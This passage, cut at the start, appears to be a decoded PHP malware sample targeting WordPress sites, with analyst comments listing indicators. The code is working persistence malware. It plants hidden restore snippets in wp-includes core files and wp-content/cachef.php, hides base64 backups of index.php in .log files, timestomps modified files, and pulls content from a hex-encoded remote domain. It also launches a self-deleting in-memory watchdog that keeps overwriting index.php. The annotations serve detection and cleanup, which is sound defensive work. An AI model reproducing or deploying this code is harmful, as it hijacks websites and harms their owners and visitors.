 * Returns the text with $insertCont added as a new line after the line that
 * holds the first occurrence of $target.
 *
 * Analyst note: not called anywhere in the visible listing; $filePath, read in the
 * first statement, is not defined inside this function.
 */
function insertAfterTarget($fileCont, $insertCont, $target)
{
$fileCont = file_get_contents($filePath);
$targetIndex = strpos($fileCont, $target);
if ($targetIndex !== false) {
$chLineIndex = strpos(substr($fileCont, $targetIndex), "\n") + $targetIndex;
if ($chLineIndex !== false) {
$fileCont = substr($fileCont, 0, $chLineIndex + 1) . $insertCont . "\n" . substr($fileCont, $chLineIndex + 1);
}
}
return $fileCont;
}
/**
 * Returns $fileCont with the line containing the first occurrence of $target removed.
 * String-only: the file-writing code is commented out.
 *
 * Analyst note: not called anywhere in the visible listing.
 */
function delTargetLine($fileCont, $target)
{
//$fileCont = file_get_contents($filePath);
$targetIndex = strpos($fileCont, $target);
if ($targetIndex !== false) {
$preChLineIndex = strrpos(substr($fileCont, 0, $targetIndex + 1), "\n");
$AfterChLineIndex = strpos(substr($fileCont, $targetIndex), "\n") + $targetIndex;
if ($preChLineIndex !== false && $AfterChLineIndex !== false) {
$fileCont = substr($fileCont, 0, $preChLineIndex + 1) . substr($fileCont, $AfterChLineIndex + 1);
// $fp = fopen($filePath, "w+");
// fwrite($fp, $result);
// fclose($fp);
}
}
return $fileCont;
}
/**
 * Returns $fileCont with $insertCont added as a new line before the line that
 * holds the last occurrence of $target.
 *
 * Analyst note: not called anywhere in the visible listing.
 */
function insertBeforeTarget($fileCont, $insertCont, $target)
{
$targetIndex = strrpos($fileCont, $target);
if ($targetIndex !== false) {
$chLineIndex = strrpos(substr($fileCont, 0, $targetIndex), "\n");
if ($chLineIndex !== false) {
$fileCont = substr($fileCont, 0, $chLineIndex + 1) . $insertCont . "\n" . substr($fileCont, $chLineIndex + 1);
}
}
return $fileCont;
}
/**
 * Returns one lowercase letter followed by a number from 0 to 50 that is not yet in
 * $usedStrings, and appends it to that by-reference list. $length is ignored.
 *
 * Analyst note: not called anywhere in the visible listing.
 */
function genRandomString($length, &$usedStrings) {
$characters = 'abcdefghijklmnopqrstuvwxyz';
$nummax=50;
$string = '';
// for ($i = 0; $i < $length; $i++) {
// $string .= $characters[mt_rand(0, strlen($characters) - 1)];
// }
$string = $characters[mt_rand(0, strlen($characters) - 1)];
$num=mt_rand(0,$nummax);
$string .=$num;
if (in_array($string, $usedStrings)) {
return genRandomString($length, $usedStrings);
} else {
$usedStrings[] = $string;
return $string;
}
}
/**
 * Obfuscation helper: rewrites every third character of $string (positions 0, 3, 6, ...)
 * as the literal text \xNN and passes the other characters through trim().
 *
 * Analyst note: the "\x48TT\x50_H\x4fST" prefix at the top of this listing has exactly
 * this every-third-character shape, which makes partially hex-escaped identifiers a
 * usable pattern for content scanning.
 */
function strto16($string)
{
$arr1 = str_split($string, 1);
$num=0;
foreach ($arr1 as $akey => $aval) {
if($num%3==0)
{
// "\x" with no hex digits after it stays a literal backslash-x in PHP.
$arr1[$akey] = "\x" . bin2hex($aval);
}
else
{
$arr1[$akey] =trim($aval);
}
$num=$num+1;
}
$arr1str=implode('',$arr1);
return $arr1str;
}
/**
 * Fetches $url through urla() (cURL) when the string contains "http" anywhere,
 * otherwise through file_get_contents().
 */
function getx($url)
{
if (stripos($url, 'http') !== false) {
$content = urla($url);
} else {
$content = file_get_contents($url);
}
return $content;
}
/**
 * cURL fetch that follows redirects and accepts gzip/deflate; POSTs when $postdata is
 * a non-empty array and adds $header when it is a non-empty array.
 * Returns the curl_exec() result.
 *
 * Analyst note: no timeout is set, and the certificate-verification options are
 * switched off only when the URL does not contain "https:".
 */
function urla($url, $header = null, $postdata = null)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
if (stripos($url, "https:") === false) {
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
}
if (is_array($header) && !empty($header)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
}
if (is_array($postdata) && !empty($postdata)) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$body = curl_exec($ch);
curl_close($ch);
return $body;
}
/**
 * Self-check probe: requests $url (hiddenma() passes "<scheme>://<host>/?ginfo") and
 * returns true only when the response contains "ok" together with "createseo.xyz"
 * or "fortuneday.xyz".
 *
 * Analyst note: indicators are requests for "/?ginfo" with the header
 * "User-Agent: googlebot" and the two domain strings in a page response.
 */
function gfiocheck($url)
{
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); // https hosts
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
curl_setopt($curl, CURLOPT_HTTPHEADER, array(
'Content-Type: application/json; charset=utf-8',
'User-Agent: googlebot'
));
$data = curl_exec($curl);
if(strpos($data,'ok') !== false && ( strpos($data,'createseo.xyz') !== false || strpos($data,'fortuneday.xyz') !== false )){
return true;
}
else
{
return false;
}
}
/**
 * Analyst note: core persistence routine. It snapshots index.php, stores base64 copies
 * in randomly named ".log" files, and plants a restore snippet (between "//c_start" and
 * "//c_end") in wp-content/cachef.php and in wp-includes files.
 *
 * Content signatures in the planted snippet: the two markers and the split strings
 * 'DOCUME' . 'NT_ROOT' and 'fil' . 'e_p' . 'ut_' . 'con' . 'ten' . 'ts'.
 *
 * @return array Status strings for each write attempt.
 */
function auto_restore_file()
{
global $fp2, $root,$gov,$mode,$domain,$http,$host;
$index_path = $root . '/index.php';
$auto_restore_staus=1;
$arr_msg = array();
// Text of a stock WordPress index.php; appended after remotely fetched content below.
$inde_content_hou="<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );";
$index_content = @file_get_contents($index_path);
if(!$index_content)
{
// No local content: fetch "<domain><db>/<db>.<mode>.idx"; both variable parts
// come straight from request parameters.
$index_content = getx($domain . $gov . '/' . $gov . '.' . $mode . '.idx');
if($index_content)
{
$index_content=$index_content."\n".$inde_content_hou;
}
else
{
$auto_restore_staus=0;
}
}
if($auto_restore_staus)
{
$index_size = strlen($index_content);
$b64_index_content = base64_encode($index_content);
$wordpress_include_path = $root . '/wp-includes/';
// wp-includes file => function declaration used as the injection point (triage list).
$arr_wordpress_filename = array(
// 'blocks.php' => 'function register_block_style_handle',
'theme.php' => 'function validate_current_theme',
//'template.php' => 'function get_archive_template',
//'rewrite.php' => 'function url_to_postid',
'admin-bar.php' => 'function wp_admin_bar_my_account_menu',
'rest-api.php' => 'function register_rest_field',
'media.php' => 'function image_downsize',
//'nav-menu.php' => 'function is_nav_menu_item',
//'theme-templates.php' => 'function wp_enable_block_templates',
'block-template.php' => 'function _strip_template_file_suffix',
'blocks/archives.php' => 'function render_block_core_archives',
'category.php' => 'function get_cat_name',
'load.php' => 'function is_wp_error',
'plugin.php' => 'function do_action_ref_array',
'query.php' => 'function is_front_page',
'cron.php' => 'function wp_schedule_event',
);
// 10 of the 11 active entries are chosen at random.
$arr_rand_wordpress_filename = array_rand($arr_wordpress_filename, 10);
// Planted snippet: when the global $gov is empty and the backup file exists, index.php
// is made writable (0644), overwritten with the decoded backup and set read-only (0444).
$hidden_code_template ="//c_start
\$f_exists =\"file_exists\"; \$ch = \"chmod\"; \$tou = \"touch\";
\$delete ='un'.'link';\$f_put = 'fil' . 'e_p' . 'ut_' . 'con' . 'ten' . 'ts';
\$f_get = 'fil' . 'e_g' . 'et_' . 'con' . 'ten' . 'ts';
global \$gov;if (!\$gov) {
\$bs_dec = \"base64_decode\"; \$idx_path = \$_SERVER['DOCUME' . 'NT_ROOT']. '/ind' . 'ex.php'; \$bk_idx_path = '#bk_idx_path#'; if (\$f_exists(\$bk_idx_path)){
@\$ch(\$idx_path, 0644); \$idx_code=\$f_get(\$bk_idx_path); \$f_result=\$f_put(\$idx_path,\$bs_dec(\$idx_code));@\$ch(\$idx_path, 0444); }
}
//c_end"."\n";
$wordpress_content_path = $root . '/wp-content/';
// File indicator: wp-content/cachef.php receives a copy of the snippet.
$wordpress_content_cache= $root . '/wp-content/cachef.php';
// Backup name = a directory from $fp2 directly followed by five random letters and
// ".log"; the content is one base64 blob of index.php.
$bk_index_path = $fp2[array_rand($fp2, 1)] . rand_abc(5) . '.log';
@file_put_contents($bk_index_path, $b64_index_content);
$new_content1='';
$bk_index_path1=$root.'/'.$bk_index_path;
$hidden_code=str_replace('#bk_idx_path#',$bk_index_path1,$hidden_code_template);
$hidden_code=str_replace('#idx_size#',$index_size,$hidden_code);
// Literal function names in the cachef.php copy are partially hex-escaped by strto16().
$hidden_code= preg_replace("/file_put_contents/",strto16('file_put_contents'),$hidden_code);
$hidden_code= preg_replace("/file_get_contents/",strto16('file_get_contents'),$hidden_code);
$hidden_code= preg_replace("/file_exists/",strto16('file_exists'),$hidden_code);
$hidden_code= preg_replace("/filesize/",strto16('filesize'),$hidden_code);
$hidden_code= preg_replace("/chmod/",strto16('chmod'),$hidden_code);
$hidden_code= preg_replace("/touch/",strto16('touch'),$hidden_code);
$putcache=@file_put_contents( $wordpress_content_cache, '<?php '.$hidden_code.' ?>');
if (!$putcache)
{
$arr_msg[] = 'modify file '.$wordpress_content_cache.' file fail.';
}
else
{
$arr_msg[] = 'modify file '.$wordpress_content_cache.' file success.';
// Timestomping: modification time set 260 days into the past.
@touch($wordpress_content_cache, strtotime("-260 days", time()));
}
foreach ($arr_rand_wordpress_filename as $key => $wordpress_filename) {
$needle = $arr_wordpress_filename[$wordpress_filename];
$wordpress_filepath = $wordpress_include_path . $wordpress_filename;
if (!file_exists($wordpress_filepath)) {
continue;
}
$old_content = file_get_contents($wordpress_filepath);
$bk_index_path3 = $fp2[array_rand($fp2, 1)] . rand_abc(5) . '.log';
@file_put_contents($bk_index_path3, $b64_index_content);
$hidden_code_template=str_replace("#bk_idx_path#",$bk_index_path3,$hidden_code_template);
$hidden_code_template=str_replace("#idx_size#",$index_size,$hidden_code_template);
$hidden_code_template=str_replace("#indexbase64#",$b64_index_content,$hidden_code_template);
// $new_content is computed but never written; $new_content1 is what reaches disk.
$new_content = str_replace($needle, $hidden_code . $needle, $old_content);
$new_content1=str_replace($needle, $hidden_code_template ."\n". $needle, $old_content);
// 438 decimal = 0666. The file is recreated and its mtime set to the previous ctime,
// so verify core files by hash against a clean release rather than by timestamp.
$fileoldtime=filectime($wordpress_filepath);
@chmod($wordpress_filepath, 438);
@unlink($wordpress_filepath);
$success = @file_put_contents($wordpress_filepath, $new_content1);
touch($wordpress_filepath,$fileoldtime);
$arr_msg[] = 'hide code: ' . $wordpress_filepath . ' ' . ($success ? 'success' : 'fail');
}
}
else
{
$arr_msg[] ='hide code fail';
}
return $arr_msg;
}
/**
 * Analyst note: strips earlier injected blocks from wp-includes files; hiddenma() runs
 * it immediately before auto_restore_file().
 *
 * Marker strings usable as content signatures: "// cyborg_start" ... "// cyborg_end",
 * "//c_start" ... "//c_end", and "i = 'inde'.'x.php';" in pluggable.php and cron.php.
 *
 * @return array Status strings for the "//c_start" removals and the two cleancroncode() calls.
 */
function crack_auto_restore()
{
global $root;
$arr_wordpress_filename = array(
'blocks.php' => 'function register_block_style_handle',
'theme.php' => 'function validate_current_theme',
'template.php' => 'function get_archive_template',
'rewrite.php' => 'function url_to_postid',
'admin-bar.php' => 'function wp_admin_bar_my_account_menu',
'rest-api.php' => 'function register_rest_field',
'media.php' => 'function image_downsize',
'nav-menu.php' => 'function is_nav_menu_item',
'theme-templates.php' => 'function wp_enable_block_templates',
'block-template.php' => 'function _strip_template_file_suffix',
'blocks/archives.php' => 'function render_block_core_archives',
'category.php' => 'function get_cat_name',
'load.php' => 'function is_wp_error',
'plugin.php' => 'function do_action_ref_array',
'query.php' => 'function is_front_page',
'cron.php' => 'function wp_schedule_event',
);
$wordpress_include_path = $root . '/wp-includes/';
$arr_msg = array();
// Pass 1: remove blocks between the "// cyborg_start" and "// cyborg_end" markers.
foreach ($arr_wordpress_filename as $wordpress_filename => $needle) {
$wordpress_filepath = $wordpress_include_path . $wordpress_filename;
if (!file_exists($wordpress_filepath)) {
continue;
}
$old_content = @file_get_contents($wordpress_filepath);
if (preg_match('/\/\/ cyborg_start[\s\S]*?\/\/ cyborg_end/', $old_content)) {
$new_content = preg_replace('/\/\/ cyborg_start[\s\S]*?\/\/ cyborg_end/', '', $old_content);
file_put_contents($wordpress_filepath, $new_content);
// Logged into $arr_logs, which is never returned or printed.
$arr_logs[] = 'delete hidden code: ' . $wordpress_filepath;
}
}
// Pass 2: remove blocks between the "//c_start" and "//c_end" markers.
foreach ($arr_wordpress_filename as $wordpress_filename => $needle) {
$wordpress_filepath = $wordpress_include_path . $wordpress_filename;
if (!file_exists($wordpress_filepath)) {
continue;
}
$old_content = file_get_contents($wordpress_filepath);
if (preg_match('/\/\/c_start[\s\S]*?\/\/c_end/', $old_content)) {
$new_content = preg_replace('/\/\/c_start[\s\S]*?\/\/c_end/', '', $old_content);
$success = @file_put_contents($wordpress_filepath, $new_content);
$arr_msg[] = 'crack restore: ' . $wordpress_filepath . ' ' . ($success ? 'success' : 'fail');
}
}
// if (file_exists('wp-includes/fonts/dashicons.ttc')) {
// @unlink('wp-includes/fonts/dashicons.ttc');
// $arr_msg[] = "delete ttc ok";
// }
// if (file_exists('wp-admin/images/browser-tiny.png')) {
// @unlink('wp-admin/images/browser-tiny.png');
// $arr_msg[] = "delete png ok";
// }
$arr_msg[] = "pluggable " . cleancroncode($root.'/wp-includes/pluggable.php', "i = 'inde'.'x.php';", "if ( ! function_exists( 'wp_set_auth_cookie'");
$arr_msg[] = "cron " . cleancroncode($root.'/wp-includes/cron.php', "i = 'inde'.'x.php';", "function wp_get_schedules() {");
return $arr_msg;
}
/**
 * Rewrites $file without the text from one byte before the first occurrence of
 * $startstr up to (not including) the first occurrence of $endstr.
 * Returns 'clear cron code' when $startstr was found, otherwise 'cron no code'.
 *
 * Analyst note: the $endstr search result is used unchecked and the file is
 * overwritten in place with no backup.
 */
function cleancroncode($file, $startstr, $endstr)
{
$msg = 'cron no code';
if (file_exists($file)) {
$ma = file_get_contents($file);
$start = strpos($ma, $startstr);
if ($start !== false) {
$head = substr($ma, 0, $start - 1);
$end = strpos($ma, $endstr);
$foot = substr($ma, $end);
file_put_contents($file, $head . $foot);
$msg = 'clear cron code';
} else {
$msg = 'cron no code';
}
}
return $msg;
}
/**
 * Rewrites $file so that $src plus a newline precedes every occurrence of $beforetag,
 * and returns a "line of <file> ok" / "line of <file> fail" message.
 *
 * Analyst note: not called anywhere in the visible listing.
 */
function insertcroncode($file, $src, $beforetag)
{
// code
$c = file_get_contents($file);
$pn = file_put_contents($file, str_replace($beforetag, $src . "\n" . $beforetag, $c));
if ($pn) {
$msg = "line of $file ok";
} else {
$msg = "line of $file fail";
}
return $msg;
}
/**
 * Prints the result of a run to the HTTP response, either as JSON or as a
 * simple HTML report.
 *
 * In HTML mode the body is framed by the literal strings "---------start "
 * and "---------end " followed by the title and "===>status:". The only call
 * in this listing passes the result of hiddenma(), whose title is the
 * function name, so a response containing "---------start hiddenma" is a
 * usable signature for this script in proxy or WAF response logs.
 *
 * @param mixed  $result       Expected to be an array with optional 'title',
 *                             'message' (list of strings) and 'status' keys.
 * @param string $message_type 'html' for the HTML report; any other value emits JSON.
 * @param string $html_tag     Element name wrapped around each message line.
 * @return void
 */
function output_message($result, $message_type = 'html', $html_tag = 'li')
{
// Any value other than 'html' switches to a machine-readable JSON response.
if ($message_type != 'html') {
echo json_encode($result);
return;
}
if (!is_array($result)) {
return;
}
if (!isset($result['title'])) {
$result['title'] = '';
}
echo '---------start ' . $result['title'];
// 'message' is read without an isset() check.
if (sizeof($result['message']) > 0) {
foreach ($result['message'] as $message) {
// Colour-code the outcome keywords; messages (which contain file paths and
// URLs built elsewhere) are echoed without HTML escaping.
$message = str_replace('success', '<font color="blue">success</font>', $message);
$message = str_replace(' ok', '<font color="blue"> ok</font>', $message);
$message = str_replace('fail', '<font color="red">fail</font>', $message);
echo "<$html_tag>" . $message . "</$html_tag>";
}
}
if (isset($result['status']) && !empty($result['status'])) {
// Only 'ok' and 'fail' assign $status; any other non-empty status value
// reaches the echo below with $status unset.
if ($result['status'] == 'ok') {
$status = '<font color="green">' . $result['status'] . '</font>';
}
if ($result['status'] == 'fail') {
$status = '<font color="red">' . $result['status'] . '</font>';
}
echo '---------end ' . $result['title'] . '===>status:' . $status;
} else {
// No status supplied: the report always ends with a green "ok".
$status = '<font color="green">ok</font>';
echo '---------end ' . $result['title'] . '===>status:' . $status;
}
echo "<br />";
echo "<br />";
}
/**
 * Walks the directory tree below $path and records, in the global $arpath8,
 * every non-symlinked directory that has no index.php of its own.
 *
 * Paths are stored relative to the global $root. Recursion stops once the
 * relative path already contains three or more "/" separators. In the lines
 * visible here the collected list is only consumed by fp2(); what the
 * directories are used for afterwards is not shown (presumably candidate
 * locations for dropped files; confirm against the rest of the sample).
 *
 * @param string $path Directory to scan.
 * @return void
 */
function fi1($path)
{
global $root, $arpath8;
if ($handle = opendir($path)) {
while (($file = readdir($handle)) !== false) {
if ($file != "." && $file != "..") {
$pfile = $path . "/" . $file;
// Symlinked directories are skipped.
if (is_dir($pfile) && !is_link($pfile)) {
// Depth limit: only descend while the root-relative path has fewer than 3 slashes.
if (substr_count(str_replace($root . '/', '', $pfile), '/') < 3) {
fi1($pfile);
}
// Recorded regardless of the depth check above, as long as the directory
// does not already contain an index.php.
if (!file_exists($pfile . "/index.php")) {
array_push($arpath8, str_replace($root . '/', '', $pfile));
}
}
}
}
}
// Runs at the end of every call, including recursive ones, so the final
// order of $arpath8 is randomised.
shuffle($arpath8);
}
/**
 * Filters the global $arpath8 down to entries that have at least three
 * "/"-separated segments once $root has been removed from them.
 *
 * $root is declared both as the parameter and in the global statement; the
 * other imported globals are not used in the body.
 *
 * @param string $root Document root used as the prefix to strip.
 * @return array List of the directory paths from $arpath8 that passed the filter.
 */
function fp2($root)
{
global $root, $http, $host, $domain, $ht, $gov, $arpath8;
$p_arr = array();
$pnew_arr = array();
foreach ($arpath8 as $k => $v) {
$qupath = str_replace($root, "", $v);
$p_arr[$k] = explode("/", $qupath);
// Keep only paths nested at least three segments deep.
if (count($p_arr[$k]) >= 3) {
$pnew_arr[] = $v;
}
}
return $pnew_arr;
}
/**
 * Returns a pseudo-random string of ASCII letters of the requested length.
 *
 * The alphabet is shuffled with str_shuffle() and truncated, so the output
 * is mixed-case letters only, with no digits or punctuation. No caller is
 * visible in this part of the listing.
 *
 * @param int $length Number of characters wanted.
 * @return string
 */
function rand_abc($length)
{
$str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$strlen = 52;
// Grow the pool until it is at least $length characters long. The string
// doubles on each pass while the counter only advances by 52.
while ($length > $strlen) {
$str .= $str;
$strlen += 52;
}
$str = str_shuffle($str);
return substr($str, 0, $length);
}
/**
 * Fires a GET request at $url and throws the response away.
 *
 * TLS peer and host-name verification are both switched off, so the request
 * succeeds against self-signed or mismatched certificates. Warnings are
 * suppressed with @ and nothing is returned; the function exists to trigger
 * the target URL, not to read it. In this listing it is called by
 * auto_restore_cycle() against a script on the same host.
 *
 * @param string $url     URL to request.
 * @param int    $timeout Read timeout in seconds for the HTTP stream context.
 * @return void
 */
function file_get_https($url, $timeout)
{
$arrContextOptions = array(
"ssl" => array(
// Certificate validation disabled.
"verify_peer" => false,
"verify_peer_name" => false,
),
'http' => array(
'method' => "GET",
'timeout' => $timeout,
),
);
@file_get_contents($url, false, stream_context_create($arrContextOptions));
}
/**
 * Starts a memory-resident watchdog that keeps DOCUMENT_ROOT/index.php
 * pinned to its current contents, then removes the on-disk launcher.
 *
 * Sequence, as written below:
 *  1. The payload in $code is written to DOCUMENT_ROOT/cyborg_tmp.php.
 *  2. That file is requested over HTTP(S) from the same host with a
 *     3-second timeout, which starts the payload in a web-server PHP worker.
 *  3. cyborg_tmp.php is deleted, so the watchdog afterwards exists only as
 *     a running process.
 *
 * What the payload string does when executed:
 *  - set_time_limit(99 - 99) evaluates to 0 (no execution limit) and
 *    ignore_user_abort(1) keeps it running after the client disconnects.
 *  - It answers "888" with "Connection: close" and an explicit
 *    Content-Length, flushes, and only then enters the loop, so the
 *    requester is released while the worker keeps running.
 *  - It deletes DOCUMENT_ROOT/3FNDICU2KH, snapshots index.php, and every
 *    2 seconds rewrites index.php from the snapshot if the file is missing
 *    or differs. chmod 438 is octal 0666 before the rewrite and chmod 292
 *    is octal 0444 afterwards.
 *  - The loop exits when the file DOCUMENT_ROOT/3FNDICU2KH exists.
 *
 * Response notes: cleaning index.php on disk is undone within seconds while
 * the worker is alive. Terminating the PHP worker processes (for example by
 * restarting the PHP/web service), or the presence of the flag file, ends
 * the loop. Indicators: requests for /cyborg_tmp.php in access logs, a
 * response body of "888", index.php left with mode 0444, and a PHP worker
 * that never finishes its request.
 *
 * @return array Log lines describing the write, the trigger request and the delete.
 */
function auto_restore_cycle()
{
$arr_msg = array();
// Payload source held as a double-quoted string; the \$ escapes keep the
// variable names literal so they are evaluated only when the dropped file runs.
$code ="<?php set_time_limit(99 - 99);
ignore_user_abort(1);
function auto_restore_memory()
{
\$index_path = \$_SERVER['DOCUMENT_ROOT'] . '/index.php';
\$flag_filename = \$_SERVER['DOCUMENT_ROOT'] . '/3FNDICU2KH';
@unlink(\$flag_filename);
\$index_code = @file_get_contents(\$index_path);
while (1) {
clearstatcache();
if (file_exists(\$flag_filename)){
break;
}
if (!file_exists(\$index_path) or @file_get_contents(\$index_path) != \$index_code) {
@chmod(\$index_path, 438);
@unlink(\$index_path);
@file_put_contents(\$index_path, \$index_code);
@chmod(\$index_path, 292);
}
sleep(2);
}
}
ob_end_clean();
header(\"Connection: close\");
ob_start();
echo 888;
header(\"Content-Length: \" . ob_get_length());
ob_end_flush();
flush();
auto_restore_memory(); ?>";
// Launcher is written to the web root so it can be reached by URL.
$file_path = $_SERVER['DOCUMENT_ROOT'] . '/' . 'cyborg_tmp.php';
$success = @file_put_contents($file_path, $code);
$arr_msg[] = 'write tmp file: ' . $file_path . ' ' . ($success ? 'success' : 'fail');
if (!$success) {
return $arr_msg;
}
// Build the launcher's public URL from the request's own scheme and Host header.
$protocol = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http';
$file_url = str_replace($_SERVER['DOCUMENT_ROOT'], $protocol . '://' . $_SERVER['HTTP_HOST'], $file_path);
// Self-request; the outcome is not inspected, and 'ok' is logged unconditionally.
file_get_https($file_url, 3);
$arr_msg[] = 'get: ' . $file_url . ' ok';
// Remove the launcher; the loop started above keeps running in its worker.
$success = @unlink($file_path);
$arr_msg[] = 'delete: ' . $file_path . ' ' . ($success ? 'success' : 'fail');
return $arr_msg;
}
/**
 * Main routine of the script: on a WordPress installation it runs the
 * restore/persistence steps in order and collects their log lines.
 *
 * The WordPress check is two relative is_dir() tests, so it depends on the
 * working directory (the top-level code calls chdir() to the document root
 * before invoking this function). crack_auto_restore(), auto_restore_file()
 * and gfiocheck() are defined outside this part of the listing.
 *
 * @return array ['title' => 'hiddenma', 'message' => list of log strings];
 *               the 'message' key is only populated inside the WordPress branch.
 */
function hiddenma()
{
global $root, $http, $host, $ht, $gov, $sitemap_code_file, $oneline, $mode, $domain,$fsize;
$return_result = array();
$return_result['title'] = __FUNCTION__;
if (is_dir("wp-includes") && is_dir("wp-admin")) {
// Disabled in this build: calls to an adduser() helper with the account
// names 'wp-blog' and 'wp-user'. Those names are still worth checking for
// in the users table of an affected site, since other builds may enable them.
// if (file_exists("wp-config.php")) {
// $return_result['message'][] = adduser('wp-blog', '$P$BFHUiQbVj3FJKfYu/xB/LTghBaAXLe1', true);
// $return_result['message'][] = adduser('wp-user', '1bc83cec427917671aef3f1c63c150f9', false);
// }
$arr_msg = crack_auto_restore();
foreach ($arr_msg as $key => $msg) {
$return_result['message'][] = $msg;
}
$arr_msg = auto_restore_file();
foreach ($arr_msg as $key => $msg) {
$return_result['message'][] = $msg;
}
// $wcc_file=@file_get_contents($_SERVER['DOCUMENT_ROOT'].'/wp-content/cachef'));
// Probes the site's own front page with a "?ginfo" query string; requests
// carrying that parameter are a searchable pattern in access logs.
$check_ginfo_url=$http.'://'.$host.'/?ginfo';
$check_staus=gfiocheck($check_ginfo_url);
if($check_staus)
{
$return_result['message'][] = 'ginfo:ok';
}
// Starts the in-memory index.php watchdog (see auto_restore_cycle()).
$arr_msg = auto_restore_cycle();
foreach ($arr_msg as $key => $msg) {
$return_result['message'][] = $msg;
}
}
return $return_result;
}
// ---- Script entry point -------------------------------------------------
// Output format is chosen by the requester: POST message_type=<anything but
// 'html'> yields JSON, otherwise an HTML report. No authentication check is
// present in these lines.
if (isset($_POST['message_type']) && !empty($_POST['message_type'])) {
$message_type = $_POST['message_type'];
} else {
$message_type = 'html';
}
// User-Agent string copied from Bing's crawler; only assigned here, its use
// is outside the visible lines.
$useragent = "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)";
// Hex-escaped string literal; decodes to hxxp://s[.]newnday[.]xyz/ (defanged
// here). Outbound connections to this host are a network indicator.
$domain = "\x68\x74\x74\x70\x3a\x2f\x2f\x73\x2e\x6e\x65\x77\x6e\x64\x61\x79\x2e\x78\x79\x7a\x2f";
$root = $_SERVER['DOCUMENT_ROOT'];
// Work from the document root so the relative wp-includes / wp-admin checks
// in hiddenma() resolve against the site root.
@chdir($root);
$http = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http';
// Taken from the request's Host header.
$host = $_SERVER["HTTP_HOST"];
// Enumerate directories without an index.php, then keep the deeper ones.
// $fp2 is not read again in the lines shown here.
$arpath8 = array();
fi1($root);
$fp2 = @fp2($root);
// Front-controller rewrite rules in the same shape as WordPress's default
// .htaccess block (every non-file, non-directory request goes to index.php).
// Only assigned here; where it is written is outside the visible lines.
$ht =
'
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
';
// Run the main routine and print its report to the response.
$hiddenma_result = hiddenma(); // 4
output_message($hiddenma_result, $message_type);
?>
Function Calls
| None |
Stats
| MD5 | aab075c5fc5a4067843927dd70667b8d |
| Eval Count | 0 |
| Decode Time | 66 ms |